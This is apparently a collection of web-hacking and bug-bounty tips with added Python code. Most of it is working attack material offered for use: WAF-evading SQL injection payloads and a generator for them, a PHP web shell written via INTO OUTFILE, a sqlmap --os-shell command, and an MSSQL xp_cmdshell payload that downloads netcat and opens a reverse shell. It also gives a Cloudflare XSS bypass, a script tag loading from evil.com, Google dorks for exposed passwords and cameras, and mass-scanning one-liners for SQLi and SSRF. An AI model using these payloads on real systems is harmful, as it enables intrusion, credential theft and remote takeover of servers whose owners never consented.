Disclosed vulnerabilities with bug bounty
1. Account takeover via Self-XSS
An example of how additional functionality can be used to turn an otherwise useless Self-XSS into a one-click account takeover. See the report for more details.
2. SQL injection in a POST request
Identification and exploitation of a Union-based SQL injection in a POST request, driven by the server's responses. More information about exploiting such vulnerabilities here.
3. OTP bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
About bypassing protection against SQL injections
Often a site's WAF stifles every attempt at SQL injection and won't even let a single quotation mark through, never mind the usual payload. With a few clever manipulations, though, it can often still be bypassed, for example:
- by adding control characters such as %00 or %0A (this only helps when the application URL-decodes them before the query is built);
- by replacing a string comparison with an arithmetic one, e.g. 'AND'1'=1*1 instead of 'AND'1'='1' ;
- by wrapping keywords in MySQL versioned comments (a MySQL-specific feature; other engines just see a comment), e.g.
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more.
For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
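The tricks above are mechanical, so they are easy to apply to a whole probe at once. The following is an added example, not code from the original post: it rewrites the SQL keywords of one UNION probe with alternating case, URL-encoding of the first character, MySQL versioned comments, and all three stacked, producing the same `/*!50000%55nIoN*/` shape shown above. It assumes a MySQL backend (the versioned-comment trick is MySQL-only) and that the target decodes the percent-encoded byte before the query is assembled.

```python
import re

# Added example (not from the original post): produce WAF-evasive rewrites of
# one SQL injection probe. The versioned-comment trick assumes a MySQL backend.
KEYWORDS = ("union", "select", "from", "where", "and", "or")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)


def alternate_case(word: str) -> str:
    """union -> uNiOn: beats signatures that match a fixed or lower-cased keyword."""
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(word))


def url_encode_first(word: str) -> str:
    """union -> %75nion: the server decodes it, a WAF that doesn't normalise won't."""
    return f"%{ord(word[0]):02X}{word[1:]}"


def versioned_comment(word: str) -> str:
    """union -> /*!50000union*/: MySQL executes it, most other parsers see a comment."""
    return f"/*!50000{word}*/"


def rewrite_keywords(payload: str, transform) -> str:
    """Apply transform to every whole-word SQL keyword in payload (case-insensitive)."""
    return KEYWORD_RE.sub(lambda m: transform(m.group(0)), payload)


def variants(payload: str) -> list:
    """Return (technique, payload) pairs, from least to most obfuscated.
    Spaces are left alone on purpose: the trailing '-- ' comment needs a real space."""
    stacked = lambda w: versioned_comment(url_encode_first(alternate_case(w)))
    return [
        ("case", rewrite_keywords(payload, alternate_case)),
        ("url-encoded", rewrite_keywords(payload, url_encode_first)),
        ("versioned-comment", rewrite_keywords(payload, versioned_comment)),
        ("stacked", rewrite_keywords(payload, stacked)),
    ]


if __name__ == "__main__":
    for name, p in variants("' union select 1,2,3 -- -"):
        print(f"{name:18} {p}")
```

Run each variant through the same request and compare the WAF verdict (block page or status code) with the original; the first one that reaches the backend tells you which normalisation the WAF is missing.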
Forgotten database dumps
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
Google dork for the same file names:
intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
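Probing the checklist by hand is tedious, and the usual trap is a site that answers every unknown path with a 200 "not found" page. Below is an added example, not part of the original post: it requests each path, reads only the first few kilobytes, and reports a hit only when the body carries a dump signature (mysqldump/pg_dump headers, CREATE TABLE/INSERT INTO, or the SQLite file header) and no HTML. The fetcher is injected so the logic can be exercised offline; the host example.test and the responses in FAKE_SITE are constructed.

```python
import urllib.error
import urllib.request
from typing import Callable, List, Tuple

# Added example (not from the original post): probe the checklist above and keep
# only hits whose body actually looks like a dump, so "200 OK" soft-404 pages
# are not reported. Hostnames and responses in FAKE_SITE are constructed.
DUMP_PATHS = [
    "/back.sql", "/backup.sql", "/accounts.sql", "/backups.sql", "/clients.sql",
    "/customers.sql", "/data.sql", "/database.sql", "/database.sqlite", "/users.sql",
    "/db.sql", "/db.sqlite", "/db_backup.sql", "/dbase.sql", "/dbdump.sql",
    "/setup.sql", "/sqldump.sql", "/dump.sql", "/mysql.sql", "/sql.sql", "/temp.sql",
]

# Byte patterns found near the start of real dumps (mysqldump / pg_dump text, SQLite header).
DUMP_MARKERS = (b"-- MySQL dump", b"-- PostgreSQL database dump", b"CREATE TABLE",
                b"INSERT INTO", b"SQLite format 3\x00")

# A fetcher returns (status, first bytes of body); injected so the logic runs offline.
Fetcher = Callable[[str], Tuple[int, bytes]]


def looks_like_dump(status: int, head: bytes) -> bool:
    """True for a 200 whose first bytes carry a dump signature and no HTML."""
    if status != 200 or not head:
        return False
    start = head[:512].lower()
    if b"<html" in start or b"<!doctype" in start:
        return False  # an error page served with status 200
    return any(marker in head for marker in DUMP_MARKERS)


def find_dumps(base_url: str, fetch: Fetcher, paths: List[str] = DUMP_PATHS) -> List[str]:
    """Return the checklist paths on base_url that serve something dump-like."""
    base = base_url.rstrip("/")
    return [p for p in paths if looks_like_dump(*fetch(base + p))]


def http_fetch(url: str, limit: int = 4096, timeout: int = 10) -> Tuple[int, bytes]:
    """Real fetcher: GET the URL but read only the first `limit` bytes."""
    req = urllib.request.Request(url, headers={"User-Agent": "dump-check/0.1"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(limit)
    except urllib.error.HTTPError as err:
        return err.code, b""
    except (urllib.error.URLError, OSError):
        return 0, b""


# Constructed responses standing in for a target, including a soft-404 on /dump.sql.
FAKE_SITE = {
    "https://example.test/backup.sql": (200, b"-- MySQL dump 10.13\nCREATE TABLE `users` (\n  `id` int\n);\nINSERT INTO `users` VALUES (1,'admin');\n"),
    "https://example.test/db.sqlite": (200, b"SQLite format 3\x00" + bytes(84)),
    "https://example.test/dump.sql": (200, b"<!DOCTYPE html><html><body>Page not found</body></html>"),
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    return FAKE_SITE.get(url, (404, b""))


if __name__ == "__main__":
    print(find_dumps("https://example.test", fake_fetch))    # offline demo
    # print(find_dumps("https://target.example", http_fetch))  # against a real host
```

Reading only the head of each response keeps the check cheap even when a multi-gigabyte dump is really there; download it separately once the hit is confirmed and in scope.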
Transition from SQL injection to shell or backdoor
- Use INTO OUTFILE to write a web shell to a file (MySQL; this needs the FILE privilege, a secure_file_priv setting that permits the target directory, a web root writable by the database user, and a UNION with the right number of columns):
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
- Capture the request in Burp Proxy, save it to a file named post-request, then run sqlmap (--os-shell uploads its stager through the same INTO OUTFILE mechanism, so the same prerequisites apply):
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
- Reverse netcat shell via MSSQL injection when xp_cmdshell is available (URL-encoded: + is a space, %26 is &; it writes an FTP script that fetches nc.exe from 10.11.0.245 and then runs nc.exe -e cmd back to port 443; xp_cmdshell is off by default, and a sysadmin login can re-enable it with sp_configure):
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
Getting other vulnerabilities from a file upload
When testing file upload functionality in a web application, try setting the file name to the following values:
- ../../../tmp/lol.png -> for path traversal
- sleep(10)-- -.jpg -> for SQL injection
- <svg onload=alert(document.domain)>.jpg/png -> for XSS
- ; sleep 10; -> for command injection
The file name is attacker-controlled input like any other: wherever the application later uses it in a filesystem path, a query, an HTML page or a shell command, these values may surface additional vulnerabilities (the two time-based ones show up as a response delay of about 10 seconds).
#web
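The traversal and injection names above work because the upload handler trusts the client's file name. The following is an added example, not code from the original post: the vulnerable join that turns ../../../tmp/lol.png into /tmp/lol.png, next to a hardened version that keeps only an allow-listed extension, stores the file under a random name, and keeps a reduced-character-set display name for the database and the page. The upload directory /var/www/uploads is assumed; nothing is written to disk.

```python
import os
import re
import secrets
from pathlib import Path

# Added example (not from the original post): the upload-handling pattern those
# file names exploit, next to a hardened version. /var/www/uploads is an assumed
# location; nothing here touches the disk.
UPLOAD_DIR = Path("/var/www/uploads")
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}


def vulnerable_target(filename: str, upload_dir: str = str(UPLOAD_DIR)) -> str:
    """The bug: the client-supplied name is joined onto the upload directory as-is.
    '../../../tmp/lol.png' therefore resolves to /tmp/lol.png."""
    return os.path.normpath(os.path.join(upload_dir, filename))


def safe_target_path(filename: str, upload_dir: Path = UPLOAD_DIR) -> Path:
    """Hardened: keep only the allow-listed extension, never the client's name."""
    # 1. Drop any directory part (also Windows-style), which kills traversal.
    base = os.path.basename(filename.replace("\\", "/"))
    # 2. Allow-list the extension; reject everything else, including no extension.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    # 3. Store under a random name, so the original name never reaches the filesystem.
    target = upload_dir / f"{secrets.token_hex(16)}{ext}"
    # 4. Belt and braces: the resolved path must still be inside upload_dir.
    if upload_dir.resolve() not in target.resolve().parents:
        raise ValueError("path escaped upload directory")
    return target


def display_name(filename: str, max_len: int = 64) -> str:
    """What to keep for the database / UI: basename reduced to a safe character set.
    It still has to be bound as a query parameter and escaped by the template."""
    base = os.path.basename(filename.replace("\\", "/"))
    cleaned = re.sub(r"[^A-Za-z0-9._-]", "", base).lstrip(".")
    return cleaned[:max_len] or "file"


if __name__ == "__main__":
    for name in ["../../../tmp/lol.png", "sleep(10)-- -.jpg",
                 "<svg onload=alert(document.domain)>.jpg", "; sleep 10;"]:
        print("vulnerable:", vulnerable_target(name))
        try:
            print("safe:      ", safe_target_path(name), "| shown as", display_name(name))
        except ValueError as err:
            print("rejected:  ", err)
```

The random on-disk name is what removes the whole class: once the client's string never reaches the filesystem, the shell or SQL the name carries has nothing to be interpolated into, and display_name plus normal output escaping covers the XSS case.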
A small selection of interesting Google dorks
- FTP servers and sites:
intitle:"index of" inurl:ftp after:2018
- Log files with passwords:
allintext:password filetype:log after:2018
- Configuration files with passwords:
filetype:env "DB_PASSWORD" after:2018
- Lists with email addresses:
filetype:xls inurl:"email.xls"
- Open cameras:
inurl:top.htm inurl:currenttime
#web #google
After exploiting SQL injection using the following email address
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, according to the RFC the local part of an email (the login, before the @) may contain special characters if it is enclosed in double quotes. And then our beloved programming languages deviate a little on which characters they actually accept.
So, the next bit of magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);"
will validate and legally return an email containing the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
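The lesson is that "it passed email validation" is not a security property. The following is an added example, not code from the original post: a validator that, like PHP's FILTER_VALIDATE_EMAIL, accepts an RFC 5322 quoted-string local part (so both addresses above pass it), and the lookup that goes wrong when the validated address is concatenated into SQL, next to the parameterised version. The users table and its rows are constructed, and since the post's sleep() payload is MySQL-specific while the demo runs on sqlite3, the attack address uses a tautology instead.

```python
import re
import sqlite3

# Added example (not from the original post): a validator that, like PHP's
# FILTER_VALIDATE_EMAIL, accepts an RFC 5321/5322 quoted-string local part, and
# the only fix that matters: binding the address as a parameter instead of
# trusting "it passed validation". Table rows and addresses are constructed.
DOT_ATOM = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]+)*"
QUOTED = r'"(?:[^"\\\r\n]|\\.)*"'                  # "almost anything"@..., backslash escapes allowed
DOMAIN = r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?\.)+[A-Za-z]{2,}"
ADDR_SPEC = re.compile(f"(?:{DOT_ATOM}|{QUOTED})@{DOMAIN}")


def is_valid_email(address: str) -> bool:
    """RFC-shaped syntax check. A True result says nothing about the address being safe."""
    return ADDR_SPEC.fullmatch(address) is not None


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice@example.com", "admin"), ("bob@example.com", "user")])
    return db


def lookup_vulnerable(db: sqlite3.Connection, email: str) -> list:
    """Validation passed, so the address is concatenated straight into the query."""
    sql = f"SELECT email FROM users WHERE email = '{email}'"
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db: sqlite3.Connection, email: str) -> list:
    """Same query with a bound parameter: the quotes in the address are just data."""
    return [row[0] for row in db.execute("SELECT email FROM users WHERE email = ?", (email,))]


# Valid per the grammar above, yet closes the string literal and comments out the rest.
ATTACK_EMAIL = '"\' OR 1=1 --"@mail.local'
XSS_EMAIL = '"\'--><script/src=//evil.com></script>"@example.com'   # the post's address

if __name__ == "__main__":
    db = make_db()
    print(is_valid_email(ATTACK_EMAIL), is_valid_email(XSS_EMAIL))
    print("vulnerable:", lookup_vulnerable(db, ATTACK_EMAIL))   # every user
    print("safe:      ", lookup_safe(db, ATTACK_EMAIL))         # nothing
```

Tightening the validator to reject quoted local parts is a reasonable product decision, but it is not the fix: the parameterised query and output escaping are what make the address harmless whatever the validator lets through.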
Bypass Cloudflare WAF
Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>
#web #xss
Hacking with an image. PHP payload in an image.
The php-jpeg-injector tool targets web applications that pass an uploaded .jpeg through the PHP GD graphics library (imagecreatefromjpeg followed by imagejpeg, for a thumbnail or a "sanitising" re-save). That re-encoding normally destroys anything hidden in the file; the tool builds a .jpeg in which a PHP payload survives it.
GD itself does not execute anything: the resulting file still has to be parsed by PHP, for example by being included through a local file inclusion or stored under an extension the server hands to PHP. At that point PHP interprets the payload embedded in the image and executes it.
#web
GitHub Link
Find SQL injection on a site with one command
As always, a chain of tools does the work.
Findomain collects the subdomains of the site being tested.
Httpx checks which of them answer over HTTP(S).
Anew de-duplicates the live hosts (with no file argument it just passes unique lines through).
Waybackurls retrieves every URL the Wayback Machine knows for those hosts. Note that httpx prints URLs with a scheme while waybackurls queries the CDX API for a bare domain name, so if this step returns nothing, strip the scheme first (e.g. sed 's#^https\?://##').
Now gf filters the URLs down to those matching patterns for potential SQL injection (don't forget to install gf-patterns as well).
Finally, sqlmap runs over the whole list of potentially vulnerable URLs (-m reads targets from a file, --batch answers every prompt with the default).
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
Search for SSRF on a site with one command
To accomplish this task, we will use several utilities.
Findomain collects the subdomains of the site being tested.
Httpx checks which of them are alive.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, the Wayback Machine and Common Crawl.
grep "=" keeps only URLs that carry a query string, and qsreplace replaces every query-string value with the value you specify.
After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your server (or Burp Collaborator) address. Note that the command only prints the rewritten URLs: to actually send them, pipe the output into something that requests them (e.g. | httpx -silent, or | xargs -n1 curl -s -o /dev/null) and watch your listener for DNS or HTTP interactions. A hit tells you that one of those requests made the server reach out; replay the candidates individually to find which parameter was responsible.
#web #ssrf
Find hidden parameters for IDOR search
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR
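All three tools listed above rest on one idea: fingerprint the page, add candidate parameters in batches, and bisect any batch whose response changes. The following is an added example, not code from the original post or from Arjun, fuzzparam or param-miner: a compact implementation of that loop with an injectable request function, so it can run offline. The wordlist, the /user/profile endpoint and the behaviour of fake_request (it silently honours an undocumented user_id, the IDOR candidate, and a debug flag) are constructed; http_requester is the real-world stand-in for a live target.

```python
import hashlib
import urllib.request
from typing import Callable, Dict, List
from urllib.parse import urlencode

# Added example (not from the original post): the core of what Arjun/param-miner
# do, namely baseline the page, add candidate parameters in batches and bisect
# any batch whose response changes. The wordlist, the /user/profile endpoint and
# fake_request's behaviour are constructed.
WORDLIST = ["id", "user_id", "uid", "account_id", "profile_id", "username", "email",
            "role", "admin", "debug", "page", "limit", "sort", "order", "q",
            "callback", "redirect", "next", "token", "lang"]

Requester = Callable[[str, Dict[str, str]], str]   # (path, query params) -> body


def fingerprint(body: str) -> str:
    """Compare responses by length plus hash; good enough for pages without per-request noise."""
    return f"{len(body)}:{hashlib.sha256(body.encode()).hexdigest()}"


def find_hidden_params(request: Requester, path: str, wordlist: List[str] = WORDLIST,
                       batch: int = 8, marker: str = "9999") -> List[str]:
    """Return wordlist entries whose presence changes the response for path."""
    baseline = fingerprint(request(path, {}))
    if fingerprint(request(path, {})) != baseline:
        raise RuntimeError("page is not stable between identical requests; add noise filtering")
    found: List[str] = []

    def reacts(names: List[str]) -> bool:
        return fingerprint(request(path, {n: marker for n in names})) != baseline

    def bisect(names: List[str]) -> None:
        if not reacts(names):
            return
        if len(names) == 1:
            found.append(names[0])
            return
        mid = len(names) // 2
        bisect(names[:mid])   # both halves are probed: a batch may hold several hits
        bisect(names[mid:])

    for i in range(0, len(wordlist), batch):
        bisect(wordlist[i:i + batch])
    return found


def http_requester(base_url: str) -> Requester:
    """Real GET client for a run against a live target (not used in the offline demo)."""
    def request(path: str, params: Dict[str, str]) -> str:
        url = base_url.rstrip("/") + path + ("?" + urlencode(params) if params else "")
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return request


def fake_request(path: str, params: Dict[str, str]) -> str:
    """Constructed target: /user/profile silently honours user_id (the IDOR) and debug."""
    if path != "/user/profile":
        return "<h1>Not found</h1>"
    body = "<h1>Profile</h1><p>user: alice</p>"
    if "user_id" in params:
        body = f"<h1>Profile</h1><p>user #{params['user_id']}</p>"
    if "debug" in params:
        body += "<pre>debug=on</pre>"
    return body


if __name__ == "__main__":
    print(find_hidden_params(fake_request, "/user/profile"))   # ['user_id', 'debug']
```

A reacting parameter is only a lead: user_id here becomes an IDOR once you confirm that a second account's identifier returns that account's data. Pages that embed CSRF tokens or timestamps will trip the stability check; strip those regions before hashing, which is what the real tools do.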